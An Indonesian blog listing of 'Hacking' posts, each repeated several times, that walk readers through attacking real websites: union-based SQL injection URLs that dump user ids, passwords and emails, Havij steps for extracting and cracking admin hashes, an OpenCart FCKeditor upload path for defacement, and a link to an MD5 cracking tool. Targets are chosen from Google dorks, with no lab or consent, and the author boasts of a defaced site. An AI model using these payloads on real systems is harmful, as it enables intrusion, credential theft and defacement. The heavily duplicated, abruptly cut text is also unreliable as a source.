Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Cracking MD5 Hash Dengan Invisible MD5 Online Cracker


mungkin anda semua sudah pada tahu apa itu Md5. MD5 adalah salah satu mentoda kriptografi yang sering digunakan untuk menengkripsi password. Bukan cuma itu, MD5 juga biasanya digunakan untuk mengecek integritas suatu file

ada juga situs online yang menyediakan layanan md5 seperti milw0rm dan sebagainya. namun sedikit untuk share ada juga software yang bisa sedikit membantu . namanya Invisible MD5 Online Cracker  
anda bisa mendownload program tersebut di sini : http://www.ziddu.com/download/14415826/longfieldinvi.rar.html
 
=================================================================

Cracking MD5 Hash Dengan Invisible MD5 Online Cracker


mungkin anda semua sudah pada tahu apa itu Md5. MD5 adalah salah satu mentoda kriptografi yang sering digunakan untuk menengkripsi password. Bukan cuma itu, MD5 juga biasanya digunakan untuk mengecek integritas suatu file

ada juga situs online yang menyediakan layanan md5 seperti milw0rm dan sebagainya. namun sedikit untuk share ada juga software yang bisa sedikit membantu . namanya Invisible MD5 Online Cracker  
anda bisa mendownload program tersebut di sini : http://www.ziddu.com/download/14415826/longfieldinvi.rar.html
 
=================================================================

Cracking MD5 Hash Dengan Invisible MD5 Online Cracker


mungkin anda semua sudah pada tahu apa itu Md5. MD5 adalah salah satu mentoda kriptografi yang sering digunakan untuk menengkripsi password. Bukan cuma itu, MD5 juga biasanya digunakan untuk mengecek integritas suatu file

ada juga situs online yang menyediakan layanan md5 seperti milw0rm dan sebagainya. namun sedikit untuk share ada juga software yang bisa sedikit membantu . namanya Invisible MD5 Online Cracker  
anda bisa mendownload program tersebut di sini : http://www.ziddu.com/download/14415826/longfieldinvi.rar.html
 
=================================================================

Cracking MD5 Hash Dengan Invisible MD5 Online Cracker


mungkin anda semua sudah pada tahu apa itu Md5. MD5 adalah salah satu mentoda kriptografi yang sering digunakan untuk menengkripsi password. Bukan cuma itu, MD5 juga biasanya digunakan untuk mengecek integritas suatu file

ada juga situs online yang menyediakan layanan md5 seperti milw0rm dan sebagainya. namun sedikit untuk share ada juga software yang bisa sedikit membantu . namanya Invisible MD5 Online Cracker  
anda bisa mendownload program tersebut di sini : http://www.ziddu.com/download/14415826/longfieldinvi.rar.html
 
=================================================================

Tutorial Deface Website



1. tak perlulah rokok cemilan segala macam lgsg jee...eh tp kopi perlulah soalnya kadang boring,,e=ah sambil ngerokok tak apalah makan makan dikit jee (@gw :munafik gw)
buka google dan pake dork : (ini klo yg belom tw ex: inurl:/news.php?id= atau berita.php... bla bla segala macam dan ada di google ketik aja dork )

2. dan setelah ketemu tambahkan karakter ' atau "-" untuk melihat apakah ada pesan error.
ex :  www.siapagitu.com/news.php?id=100' atau
        www.siapagitu.com/news.php?id=-100


3. cari jumlah table . caranya target linkny kyk gini www.siapagitu.com/blablabla.php?blabla.php?id=23
truz ubah formatnya jadi : www.siapa gitu.com/blabla.php?id=-23 dan masukan rumus longfield einstein
contoh:  www.siapagitu.com/berita.php?id=-23+order+by+1-- atau
             www.siapagitu.com/berita.php?id=-23+order+by+1/*

ceklah truzz ampe bosan (zzz -_-")
ex :     www.siapagitu.com/berita.php?id=-100+order+by+1--
          www.siapagitu.com/berita.php?id=-100+order+by+2--
          truuzzz...
          www.siapagitu.com/berita.php?id=-100+order+by+20an--
    

sampe datang tukang pos bilang bla bla bla eror coy atau halaman td mengeluarkan pesan error
jika errornya di www.siapagitu.com/blabla.php?id=5 jadi kita tangkap bahwa 5 nomor gagal dan 4 angka sebelumnya adalah nomor togel (di ingat nih nomor)

4. truzz lgkh selanjutnya cari nomor dewa (nomor ini jga perlu di inget) cara mencari nomor ini :
pake rumus baru +union+select+1,2,3,4,-- (kan td nomor togelnya 4 jadi kita berenti di angka 4,klo misal td di angka 8 jadinya yaa tambah donk angka td  ...........4,5,6,7,8-- )

lalu tekan enter dan nanti akan keluar nomor dewa. ingat lagi ni nomor.contoh angka dewanya 2

lalu cari versi  yg diapakai situ kelinci percobaan td. masukan perintah tsb pada nagka yg keluar tadi
misal:  www.siapagitu.com/blabla.php?id=-23+union+select+1,version(),3--
           ingat letak version() harus di angka dewa

nanti akan terlihat versinya contoh : 5.0.1.12 klo di bawah versi 5 berarti cari target lain krn kita harus nebak sndiri tablenya kan pusing nebak nebak ndiri.


5. nah sekarang table . cara nyari table dengan rumus baru lagi.

cara nampilin tabel dari korban td yaitu dengan
rumus : table_name   -dimasukan pada angka dewa keluar tadi-
rumus : +from+information_schema.tables--    -dimasukan setelah angka terakhir-

www.siapagitu.com/blabla.php?id=-23+union+select+1,table_name,3+from+information_schema.tables--

nanti akan kluar nama table (yg ini macam macam ada yg table character_set,, atau artikel atau produk dan lain lain yang tidak bisa saya sebutkan satu persatu. terima kasih (kyk celeb dpt award aja..wkwkwkwk)

6. sekarang kan nama table dah dapt tuh waktunya kita sadap isi table. apa sich isi table td (contoh : kadang saya nemu di table ada yang isinya id,userid,username,member,mem_pass,email dan ada pula admin dan pass). untuk melihat isi dalam celana dalam si tabel kita pake lagi rumus baru
rumus : group_concat(table_name)       -dimasukan pada angka dewa yang keluar tadi-
rumus : +from+information_schema.tables+where+table_schema=database()    -dimasukan setelah angka terakhir-

dan nanti format urlnya jadi gini :

www.siapagitu.com/blabla.php?id=-23+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--

dan selanjutnya convert nama table td di situs banyaklah contoh : Ascii Converter yg ini caranya buat dengan karya sendiri (kan bangga) masukkin huruf table td di sana satu satu misalakan nama table yg di dapat td table member maka masukkin dari m convert b convert dan seterusnya.. eit ini cara satu dan ada lagi yg lebih gampang dengan converter online di situs http://www.dolcevie.com/js/converter.html ingat klo hasil convert nya ada simbol kyk : atau @ dan segala macam hilangkan saja dan ambil huruf dan angkanya jadi misalkan 23:1d:4b:45 jadi ambil angka dan huruf hingga jadi 231d4b45... ini juga di catat hasil convertnya..siip?


selanjutnya carilah column dengan rumus baru lagi..
rumus :  group_concat(column_name)        -dimasukan pada angka dewa yg keluar tadi-
rumus : +from+information_schema.columns+where+table_name=0xhexa--  -dimasukan setelah angka terakhir

jadi nanti format urlnya :
www.siapagitu.com/blabla.php?id=-100+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x(angka hasil converter td)--

nah setelah tekan enter maka akan keluar hasil columnnya .. isi dari column ada id,pass,user,member bla bla dan banyak lagi...contoh nya jika yang keluar td adlah : id,pass,email maka kita beranjak ke tahap selanjutnya

7. rumus baru lagi untuk tahap berikut :
rumus : concat_ws(0x3a,hasil isi column yg mau dikeluarkan)     -dimasukan pada angka yg keluar tadi-
rumus : +from+(nama table berasal)       - dimasukan setelah angka terakhir-

jadi format urlnya kyk gini :
www.siapagitu.com/blabla.php?id=-23+union+select+1,2,3,4,concat_ws(0x3a,id,pass,email),6,7,8+from+(nama table berasal)--          nama tabel berasal maksudnya td kan tabel yg kita dapat di awal sebelum dapat column yg kyk character_set,,,atau admin,,,atau,,,tabel member dan segala macam...

setelah tekan enter : TARAAA ANDA MENDAPATKAN ID,PASS,DAN EMAIL DARI KORBAN


8.nah terakhir kita cari halam login dari situs ex : www.siapagitu.com/admin.php atau ................/login.php  atau ................/cpnel       dan banyak lagi tergantung usaha anda mencari dengan nalar dan pengalaman


maaf sebelumnya jika saya menjelaskan agak berbelit belit karena perut lagi melilit mw pergi ngacrit...SALAM NEWBIE saya bwt sesepuh kalo nanti melihat.. karena saya tidak mw dikira sombong...saya cuma newbie kk.....dan masih perlu belajar lagi... thx kk kk yg sudah baca leave comment please karena jarang ada yg ngoment

==================================================================

Tutorial Deface Website



1. tak perlulah rokok cemilan segala macam lgsg jee...eh tp kopi perlulah soalnya kadang boring,,e=ah sambil ngerokok tak apalah makan makan dikit jee (@gw :munafik gw)
buka google dan pake dork : (ini klo yg belom tw ex: inurl:/news.php?id= atau berita.php... bla bla segala macam dan ada di google ketik aja dork )

2. dan setelah ketemu tambahkan karakter ' atau "-" untuk melihat apakah ada pesan error.
ex :  www.siapagitu.com/news.php?id=100' atau
        www.siapagitu.com/news.php?id=-100


3. cari jumlah table . caranya target linkny kyk gini www.siapagitu.com/blablabla.php?blabla.php?id=23
truz ubah formatnya jadi : www.siapa gitu.com/blabla.php?id=-23 dan masukan rumus longfield einstein
contoh:  www.siapagitu.com/berita.php?id=-23+order+by+1-- atau
             www.siapagitu.com/berita.php?id=-23+order+by+1/*

ceklah truzz ampe bosan (zzz -_-")
ex :     www.siapagitu.com/berita.php?id=-100+order+by+1--
          www.siapagitu.com/berita.php?id=-100+order+by+2--
          truuzzz...
          www.siapagitu.com/berita.php?id=-100+order+by+20an--
    

sampe datang tukang pos bilang bla bla bla eror coy atau halaman td mengeluarkan pesan error
jika errornya di www.siapagitu.com/blabla.php?id=5 jadi kita tangkap bahwa 5 nomor gagal dan 4 angka sebelumnya adalah nomor togel (di ingat nih nomor)

4. truzz lgkh selanjutnya cari nomor dewa (nomor ini jga perlu di inget) cara mencari nomor ini :
pake rumus baru +union+select+1,2,3,4,-- (kan td nomor togelnya 4 jadi kita berenti di angka 4,klo misal td di angka 8 jadinya yaa tambah donk angka td  ...........4,5,6,7,8-- )

lalu tekan enter dan nanti akan keluar nomor dewa. ingat lagi ni nomor.contoh angka dewanya 2

lalu cari versi  yg diapakai situ kelinci percobaan td. masukan perintah tsb pada nagka yg keluar tadi
misal:  www.siapagitu.com/blabla.php?id=-23+union+select+1,version(),3--
           ingat letak version() harus di angka dewa

nanti akan terlihat versinya contoh : 5.0.1.12 klo di bawah versi 5 berarti cari target lain krn kita harus nebak sndiri tablenya kan pusing nebak nebak ndiri.


5. nah sekarang table . cara nyari table dengan rumus baru lagi.

cara nampilin tabel dari korban td yaitu dengan
rumus : table_name   -dimasukan pada angka dewa keluar tadi-
rumus : +from+information_schema.tables--    -dimasukan setelah angka terakhir-

www.siapagitu.com/blabla.php?id=-23+union+select+1,table_name,3+from+information_schema.tables--

nanti akan kluar nama table (yg ini macam macam ada yg table character_set,, atau artikel atau produk dan lain lain yang tidak bisa saya sebutkan satu persatu. terima kasih (kyk celeb dpt award aja..wkwkwkwk)

6. sekarang kan nama table dah dapt tuh waktunya kita sadap isi table. apa sich isi table td (contoh : kadang saya nemu di table ada yang isinya id,userid,username,member,mem_pass,email dan ada pula admin dan pass). untuk melihat isi dalam celana dalam si tabel kita pake lagi rumus baru
rumus : group_concat(table_name)       -dimasukan pada angka dewa yang keluar tadi-
rumus : +from+information_schema.tables+where+table_schema=database()    -dimasukan setelah angka terakhir-

dan nanti format urlnya jadi gini :

www.siapagitu.com/blabla.php?id=-23+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--

dan selanjutnya convert nama table td di situs banyaklah contoh : Ascii Converter yg ini caranya buat dengan karya sendiri (kan bangga) masukkin huruf table td di sana satu satu misalakan nama table yg di dapat td table member maka masukkin dari m convert b convert dan seterusnya.. eit ini cara satu dan ada lagi yg lebih gampang dengan converter online di situs http://www.dolcevie.com/js/converter.html ingat klo hasil convert nya ada simbol kyk : atau @ dan segala macam hilangkan saja dan ambil huruf dan angkanya jadi misalkan 23:1d:4b:45 jadi ambil angka dan huruf hingga jadi 231d4b45... ini juga di catat hasil convertnya..siip?


selanjutnya carilah column dengan rumus baru lagi..
rumus :  group_concat(column_name)        -dimasukan pada angka dewa yg keluar tadi-
rumus : +from+information_schema.columns+where+table_name=0xhexa--  -dimasukan setelah angka terakhir

jadi nanti format urlnya :
www.siapagitu.com/blabla.php?id=-100+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x(angka hasil converter td)--

nah setelah tekan enter maka akan keluar hasil columnnya .. isi dari column ada id,pass,user,member bla bla dan banyak lagi...contoh nya jika yang keluar td adlah : id,pass,email maka kita beranjak ke tahap selanjutnya

7. rumus baru lagi untuk tahap berikut :
rumus : concat_ws(0x3a,hasil isi column yg mau dikeluarkan)     -dimasukan pada angka yg keluar tadi-
rumus : +from+(nama table berasal)       - dimasukan setelah angka terakhir-

jadi format urlnya kyk gini :
www.siapagitu.com/blabla.php?id=-23+union+select+1,2,3,4,concat_ws(0x3a,id,pass,email),6,7,8+from+(nama table berasal)--          nama tabel berasal maksudnya td kan tabel yg kita dapat di awal sebelum dapat column yg kyk character_set,,,atau admin,,,atau,,,tabel member dan segala macam...

setelah tekan enter : TARAAA ANDA MENDAPATKAN ID,PASS,DAN EMAIL DARI KORBAN


8.nah terakhir kita cari halam login dari situs ex : www.siapagitu.com/admin.php atau ................/login.php  atau ................/cpnel       dan banyak lagi tergantung usaha anda mencari dengan nalar dan pengalaman


maaf sebelumnya jika saya menjelaskan agak berbelit belit karena perut lagi melilit mw pergi ngacrit...SALAM NEWBIE saya bwt sesepuh kalo nanti melihat.. karena saya tidak mw dikira sombong...saya cuma newbie kk.....dan masih perlu belajar lagi... thx kk kk yg sudah baca leave comment please karena jarang ada yg ngoment

==================================================================

Tutorial Deface Website



1. tak perlulah rokok cemilan segala macam lgsg jee...eh tp kopi perlulah soalnya kadang boring,,e=ah sambil ngerokok tak apalah makan makan dikit jee (@gw :munafik gw)
buka google dan pake dork : (ini klo yg belom tw ex: inurl:/news.php?id= atau berita.php... bla bla segala macam dan ada di google ketik aja dork )

2. dan setelah ketemu tambahkan karakter ' atau "-" untuk melihat apakah ada pesan error.
ex :  www.siapagitu.com/news.php?id=100' atau
        www.siapagitu.com/news.php?id=-100


3. cari jumlah table . caranya target linkny kyk gini www.siapagitu.com/blablabla.php?blabla.php?id=23
truz ubah formatnya jadi : www.siapa gitu.com/blabla.php?id=-23 dan masukan rumus longfield einstein
contoh:  www.siapagitu.com/berita.php?id=-23+order+by+1-- atau
             www.siapagitu.com/berita.php?id=-23+order+by+1/*

ceklah truzz ampe bosan (zzz -_-")
ex :     www.siapagitu.com/berita.php?id=-100+order+by+1--
          www.siapagitu.com/berita.php?id=-100+order+by+2--
          truuzzz...
          www.siapagitu.com/berita.php?id=-100+order+by+20an--
    

sampe datang tukang pos bilang bla bla bla eror coy atau halaman td mengeluarkan pesan error
jika errornya di www.siapagitu.com/blabla.php?id=5 jadi kita tangkap bahwa 5 nomor gagal dan 4 angka sebelumnya adalah nomor togel (di ingat nih nomor)

4. truzz lgkh selanjutnya cari nomor dewa (nomor ini jga perlu di inget) cara mencari nomor ini :
pake rumus baru +union+select+1,2,3,4,-- (kan td nomor togelnya 4 jadi kita berenti di angka 4,klo misal td di angka 8 jadinya yaa tambah donk angka td  ...........4,5,6,7,8-- )

lalu tekan enter dan nanti akan keluar nomor dewa. ingat lagi ni nomor.contoh angka dewanya 2

lalu cari versi  yg diapakai situ kelinci percobaan td. masukan perintah tsb pada nagka yg keluar tadi
misal:  www.siapagitu.com/blabla.php?id=-23+union+select+1,version(),3--
           ingat letak version() harus di angka dewa

nanti akan terlihat versinya contoh : 5.0.1.12 klo di bawah versi 5 berarti cari target lain krn kita harus nebak sndiri tablenya kan pusing nebak nebak ndiri.


5. nah sekarang table . cara nyari table dengan rumus baru lagi.

cara nampilin tabel dari korban td yaitu dengan
rumus : table_name   -dimasukan pada angka dewa keluar tadi-
rumus : +from+information_schema.tables--    -dimasukan setelah angka terakhir-

www.siapagitu.com/blabla.php?id=-23+union+select+1,table_name,3+from+information_schema.tables--

nanti akan kluar nama table (yg ini macam macam ada yg table character_set,, atau artikel atau produk dan lain lain yang tidak bisa saya sebutkan satu persatu. terima kasih (kyk celeb dpt award aja..wkwkwkwk)

6. sekarang kan nama table dah dapt tuh waktunya kita sadap isi table. apa sich isi table td (contoh : kadang saya nemu di table ada yang isinya id,userid,username,member,mem_pass,email dan ada pula admin dan pass). untuk melihat isi dalam celana dalam si tabel kita pake lagi rumus baru
rumus : group_concat(table_name)       -dimasukan pada angka dewa yang keluar tadi-
rumus : +from+information_schema.tables+where+table_schema=database()    -dimasukan setelah angka terakhir-

dan nanti format urlnya jadi gini :

www.siapagitu.com/blabla.php?id=-23+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--

dan selanjutnya convert nama table td di situs banyaklah contoh : Ascii Converter yg ini caranya buat dengan karya sendiri (kan bangga) masukkin huruf table td di sana satu satu misalakan nama table yg di dapat td table member maka masukkin dari m convert b convert dan seterusnya.. eit ini cara satu dan ada lagi yg lebih gampang dengan converter online di situs http://www.dolcevie.com/js/converter.html ingat klo hasil convert nya ada simbol kyk : atau @ dan segala macam hilangkan saja dan ambil huruf dan angkanya jadi misalkan 23:1d:4b:45 jadi ambil angka dan huruf hingga jadi 231d4b45... ini juga di catat hasil convertnya..siip?


selanjutnya carilah column dengan rumus baru lagi..
rumus :  group_concat(column_name)        -dimasukan pada angka dewa yg keluar tadi-
rumus : +from+information_schema.columns+where+table_name=0xhexa--  -dimasukan setelah angka terakhir

jadi nanti format urlnya :
www.siapagitu.com/blabla.php?id=-100+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x(angka hasil converter td)--

nah setelah tekan enter maka akan keluar hasil columnnya .. isi dari column ada id,pass,user,member bla bla dan banyak lagi...contoh nya jika yang keluar td adlah : id,pass,email maka kita beranjak ke tahap selanjutnya

7. rumus baru lagi untuk tahap berikut :
rumus : concat_ws(0x3a,hasil isi column yg mau dikeluarkan)     -dimasukan pada angka yg keluar tadi-
rumus : +from+(nama table berasal)       - dimasukan setelah angka terakhir-

jadi format urlnya kyk gini :
www.siapagitu.com/blabla.php?id=-23+union+select+1,2,3,4,concat_ws(0x3a,id,pass,email),6,7,8+from+(nama table berasal)--          nama tabel berasal maksudnya td kan tabel yg kita dapat di awal sebelum dapat column yg kyk character_set,,,atau admin,,,atau,,,tabel member dan segala macam...

setelah tekan enter : TARAAA ANDA MENDAPATKAN ID,PASS,DAN EMAIL DARI KORBAN


8.nah terakhir kita cari halam login dari situs ex : www.siapagitu.com/admin.php atau ................/login.php  atau ................/cpnel       dan banyak lagi tergantung usaha anda mencari dengan nalar dan pengalaman


maaf sebelumnya jika saya menjelaskan agak berbelit belit karena perut lagi melilit mw pergi ngacrit...SALAM NEWBIE saya bwt sesepuh kalo nanti melihat.. karena saya tidak mw dikira sombong...saya cuma newbie kk.....dan masih perlu belajar lagi... thx kk kk yg sudah baca leave comment please karena jarang ada yg ngoment

==================================================================

Tutorial Deface Website



1. tak perlulah rokok cemilan segala macam lgsg jee...eh tp kopi perlulah soalnya kadang boring,,e=ah sambil ngerokok tak apalah makan makan dikit jee (@gw :munafik gw)
buka google dan pake dork : (ini klo yg belom tw ex: inurl:/news.php?id= atau berita.php... bla bla segala macam dan ada di google ketik aja dork )

2. dan setelah ketemu tambahkan karakter ' atau "-" untuk melihat apakah ada pesan error.
ex :  www.siapagitu.com/news.php?id=100' atau
        www.siapagitu.com/news.php?id=-100


3. cari jumlah table . caranya target linkny kyk gini www.siapagitu.com/blablabla.php?blabla.php?id=23
truz ubah formatnya jadi : www.siapa gitu.com/blabla.php?id=-23 dan masukan rumus longfield einstein
contoh:  www.siapagitu.com/berita.php?id=-23+order+by+1-- atau
             www.siapagitu.com/berita.php?id=-23+order+by+1/*

ceklah truzz ampe bosan (zzz -_-")
ex :     www.siapagitu.com/berita.php?id=-100+order+by+1--
          www.siapagitu.com/berita.php?id=-100+order+by+2--
          truuzzz...
          www.siapagitu.com/berita.php?id=-100+order+by+20an--
    

sampe datang tukang pos bilang bla bla bla eror coy atau halaman td mengeluarkan pesan error
jika errornya di www.siapagitu.com/blabla.php?id=5 jadi kita tangkap bahwa 5 nomor gagal dan 4 angka sebelumnya adalah nomor togel (di ingat nih nomor)

4. truzz lgkh selanjutnya cari nomor dewa (nomor ini jga perlu di inget) cara mencari nomor ini :
pake rumus baru +union+select+1,2,3,4,-- (kan td nomor togelnya 4 jadi kita berenti di angka 4,klo misal td di angka 8 jadinya yaa tambah donk angka td  ...........4,5,6,7,8-- )

lalu tekan enter dan nanti akan keluar nomor dewa. ingat lagi ni nomor.contoh angka dewanya 2

lalu cari versi  yg diapakai situ kelinci percobaan td. masukan perintah tsb pada nagka yg keluar tadi
misal:  www.siapagitu.com/blabla.php?id=-23+union+select+1,version(),3--
           ingat letak version() harus di angka dewa

nanti akan terlihat versinya contoh : 5.0.1.12 klo di bawah versi 5 berarti cari target lain krn kita harus nebak sndiri tablenya kan pusing nebak nebak ndiri.


5. nah sekarang table . cara nyari table dengan rumus baru lagi.

cara nampilin tabel dari korban td yaitu dengan
rumus : table_name   -dimasukan pada angka dewa keluar tadi-
rumus : +from+information_schema.tables--    -dimasukan setelah angka terakhir-

www.siapagitu.com/blabla.php?id=-23+union+select+1,table_name,3+from+information_schema.tables--

nanti akan kluar nama table (yg ini macam macam ada yg table character_set,, atau artikel atau produk dan lain lain yang tidak bisa saya sebutkan satu persatu. terima kasih (kyk celeb dpt award aja..wkwkwkwk)

6. sekarang kan nama table dah dapt tuh waktunya kita sadap isi table. apa sich isi table td (contoh : kadang saya nemu di table ada yang isinya id,userid,username,member,mem_pass,email dan ada pula admin dan pass). untuk melihat isi dalam celana dalam si tabel kita pake lagi rumus baru
rumus : group_concat(table_name)       -dimasukan pada angka dewa yang keluar tadi-
rumus : +from+information_schema.tables+where+table_schema=database()    -dimasukan setelah angka terakhir-

dan nanti format urlnya jadi gini :

www.siapagitu.com/blabla.php?id=-23+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--

dan selanjutnya convert nama table td di situs banyaklah contoh : Ascii Converter yg ini caranya buat dengan karya sendiri (kan bangga) masukkin huruf table td di sana satu satu misalakan nama table yg di dapat td table member maka masukkin dari m convert b convert dan seterusnya.. eit ini cara satu dan ada lagi yg lebih gampang dengan converter online di situs http://www.dolcevie.com/js/converter.html ingat klo hasil convert nya ada simbol kyk : atau @ dan segala macam hilangkan saja dan ambil huruf dan angkanya jadi misalkan 23:1d:4b:45 jadi ambil angka dan huruf hingga jadi 231d4b45... ini juga di catat hasil convertnya..siip?


selanjutnya carilah column dengan rumus baru lagi..
rumus :  group_concat(column_name)        -dimasukan pada angka dewa yg keluar tadi-
rumus : +from+information_schema.columns+where+table_name=0xhexa--  -dimasukan setelah angka terakhir

jadi nanti format urlnya :
www.siapagitu.com/blabla.php?id=-100+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x(angka hasil converter td)--

nah setelah tekan enter maka akan keluar hasil columnnya .. isi dari column ada id,pass,user,member bla bla dan banyak lagi...contoh nya jika yang keluar td adlah : id,pass,email maka kita beranjak ke tahap selanjutnya

7. rumus baru lagi untuk tahap berikut :
rumus : concat_ws(0x3a,hasil isi column yg mau dikeluarkan)     -dimasukan pada angka yg keluar tadi-
rumus : +from+(nama table berasal)       - dimasukan setelah angka terakhir-

jadi format urlnya kyk gini :
www.siapagitu.com/blabla.php?id=-23+union+select+1,2,3,4,concat_ws(0x3a,id,pass,email),6,7,8+from+(nama table berasal)--          nama tabel berasal maksudnya td kan tabel yg kita dapat di awal sebelum dapat column yg kyk character_set,,,atau admin,,,atau,,,tabel member dan segala macam...

setelah tekan enter : TARAAA ANDA MENDAPATKAN ID,PASS,DAN EMAIL DARI KORBAN


8.nah terakhir kita cari halam login dari situs ex : www.siapagitu.com/admin.php atau ................/login.php  atau ................/cpnel       dan banyak lagi tergantung usaha anda mencari dengan nalar dan pengalaman


maaf sebelumnya jika saya menjelaskan agak berbelit belit karena perut lagi melilit mw pergi ngacrit...SALAM NEWBIE saya bwt sesepuh kalo nanti melihat.. karena saya tidak mw dikira sombong...saya cuma newbie kk.....dan masih perlu belajar lagi... thx kk kk yg sudah baca leave comment please karena jarang ada yg ngoment

==================================================================

Deface Situs Dengan Havij.exe


1. langkah pertama silakan download program havij.exe : HAJIV.EXE

2. install programnya

3. carilah target di google dengan menggunakan dork ex: inurl://product.php?id=  dan masih banyak lagi dork dork lain (klo blom tw silakan cari di google)

4. setelah itu masukkan url target di kolom target seperti gambar di atas

,lalu klik analyze

5. lalu tunggu (mgkn agak lama) 1.....2.....3....4....5.... ah kelamaan nunggu lgsg klo udah ketemu seperti ngedeface situs biasa lgsg kita cari tw  jumlah table di get table (misalakan sudah dapat pilih salah satu ex: administrator dan cari jumlah column di get column

6. setelah itu pilih salah satu dan ceklis misalanya di administrator ( ada kolom id,user,pass ceklis smwa) lalu klik get data

7. setelah dapat maka akan di analyze dan muncul data username ,id dan pass

8. nah pada lgkh ini kalian liat kode passnya kan masih dalam kombinasi angka dan huruf tuh,, jadi kalian klik MD5 tengok gambar di atas.. nanti si MD5 bakal ngedecrypt

9. haa!! kalian bakal nemu hasil hash pass nya si admin.

10. belom selesai!!! nah bagian selanjutnya klik find admin di sebelah MD5 

11. nanti akan keluar halaman login , kan id,user,passnya udah tw tuh.sekarang tinggal login dah ..

12. Opp!! blom selesai searang tinggal dokumentasi..di save kek,screenshot bwt show off...bla bla bla

13. selamat mencoba

================================================================

Deface Situs Dengan Havij.exe


1. langkah pertama silakan download program havij.exe : HAJIV.EXE

2. install programnya

3. carilah target di google dengan menggunakan dork ex: inurl://product.php?id=  dan masih banyak lagi dork dork lain (klo blom tw silakan cari di google)

4. setelah itu masukkan url target di kolom target seperti gambar di atas

,lalu klik analyze

5. lalu tunggu (mgkn agak lama) 1.....2.....3....4....5.... ah kelamaan nunggu lgsg klo udah ketemu seperti ngedeface situs biasa lgsg kita cari tw  jumlah table di get table (misalakan sudah dapat pilih salah satu ex: administrator dan cari jumlah column di get column

6. setelah itu pilih salah satu dan ceklis misalanya di administrator ( ada kolom id,user,pass ceklis smwa) lalu klik get data

7. setelah dapat maka akan di analyze dan muncul data username ,id dan pass

8. nah pada lgkh ini kalian liat kode passnya kan masih dalam kombinasi angka dan huruf tuh,, jadi kalian klik MD5 tengok gambar di atas.. nanti si MD5 bakal ngedecrypt

9. haa!! kalian bakal nemu hasil hash pass nya si admin.

10. belom selesai!!! nah bagian selanjutnya klik find admin di sebelah MD5 

11. nanti akan keluar halaman login , kan id,user,passnya udah tw tuh.sekarang tinggal login dah ..

12. Opp!! blom selesai searang tinggal dokumentasi..di save kek,screenshot bwt show off...bla bla bla

13. selamat mencoba

================================================================

Deface Situs Dengan Havij.exe


1. langkah pertama silakan download program havij.exe : HAJIV.EXE

2. install programnya

3. carilah target di google dengan menggunakan dork ex: inurl://product.php?id=  dan masih banyak lagi dork dork lain (klo blom tw silakan cari di google)

4. setelah itu masukkan url target di kolom target seperti gambar di atas

,lalu klik analyze

5. lalu tunggu (mgkn agak lama) 1.....2.....3....4....5.... ah kelamaan nunggu lgsg klo udah ketemu seperti ngedeface situs biasa lgsg kita cari tw  jumlah table di get table (misalakan sudah dapat pilih salah satu ex: administrator dan cari jumlah column di get column

6. setelah itu pilih salah satu dan ceklis misalanya di administrator ( ada kolom id,user,pass ceklis smwa) lalu klik get data

7. setelah dapat maka akan di analyze dan muncul data username ,id dan pass

8. nah pada lgkh ini kalian liat kode passnya kan masih dalam kombinasi angka dan huruf tuh,, jadi kalian klik MD5 tengok gambar di atas.. nanti si MD5 bakal ngedecrypt

9. haa!! kalian bakal nemu hasil hash pass nya si admin.

10. belom selesai!!! nah bagian selanjutnya klik find admin di sebelah MD5 

11. nanti akan keluar halaman login , kan id,user,passnya udah tw tuh.sekarang tinggal login dah ..

12. Opp!! blom selesai searang tinggal dokumentasi..di save kek,screenshot bwt show off...bla bla bla

13. selamat mencoba

================================================================

Deface Situs Dengan Havij.exe


1. langkah pertama silakan download program havij.exe : HAJIV.EXE

2. install programnya

3. carilah target di google dengan menggunakan dork ex: inurl://product.php?id=  dan masih banyak lagi dork dork lain (klo blom tw silakan cari di google)

4. setelah itu masukkan url target di kolom target seperti gambar di atas

,lalu klik analyze

5. lalu tunggu (mgkn agak lama) 1.....2.....3....4....5.... ah kelamaan nunggu lgsg klo udah ketemu seperti ngedeface situs biasa lgsg kita cari tw  jumlah table di get table (misalakan sudah dapat pilih salah satu ex: administrator dan cari jumlah column di get column

6. setelah itu pilih salah satu dan ceklis misalanya di administrator ( ada kolom id,user,pass ceklis smwa) lalu klik get data

7. setelah dapat maka akan di analyze dan muncul data username ,id dan pass

8. nah pada lgkh ini kalian liat kode passnya kan masih dalam kombinasi angka dan huruf tuh,, jadi kalian klik MD5 tengok gambar di atas.. nanti si MD5 bakal ngedecrypt

9. haa!! kalian bakal nemu hasil hash pass nya si admin.

10. belom selesai!!! nah bagian selanjutnya klik find admin di sebelah MD5 

11. nanti akan keluar halaman login , kan id,user,passnya udah tw tuh.sekarang tinggal login dah ..

12. Opp!! blom selesai searang tinggal dokumentasi..di save kek,screenshot bwt show off...bla bla bla

13. selamat mencoba

================================================================

Deface Site Power By OpenCart



1. langkah pertama buka google dan masukkan dork : power by opencart

2. setelah pencarian keluar carilah target yang mw di uji
3. tambhkan POC berikut di belakang url target :
>>> admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

4. klo berhasil maka akan muncul tampilan seperti gambar di bawah ini 

    
5. lalu ubah ASP jadi PHP dan upload kalian ex :longfield.htm    
6. dah hasilnya bisa kalian liat dengan format url : http://targetkalian.eeq/filekalianupload.htm
contoh yang berhasil saya deface : klik di sini  
7. silakan coba sendiri 
===========================================================

Deface Site Power By OpenCart



1. langkah pertama buka google dan masukkan dork : power by opencart

2. setelah pencarian keluar carilah target yang mw di uji
3. tambhkan POC berikut di belakang url target :
>>> admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

4. klo berhasil maka akan muncul tampilan seperti gambar di bawah ini 

    
5. lalu ubah ASP jadi PHP dan upload kalian ex :longfield.htm    
6. dah hasilnya bisa kalian liat dengan format url : http://targetkalian.eeq/filekalianupload.htm
contoh yang berhasil saya deface : klik di sini  
7. silakan coba sendiri 
===========================================================

Deface Site Power By OpenCart



1. langkah pertama buka google dan masukkan dork : power by opencart

2. setelah pencarian keluar carilah target yang mw di uji
3. tambhkan POC berikut di belakang url target :
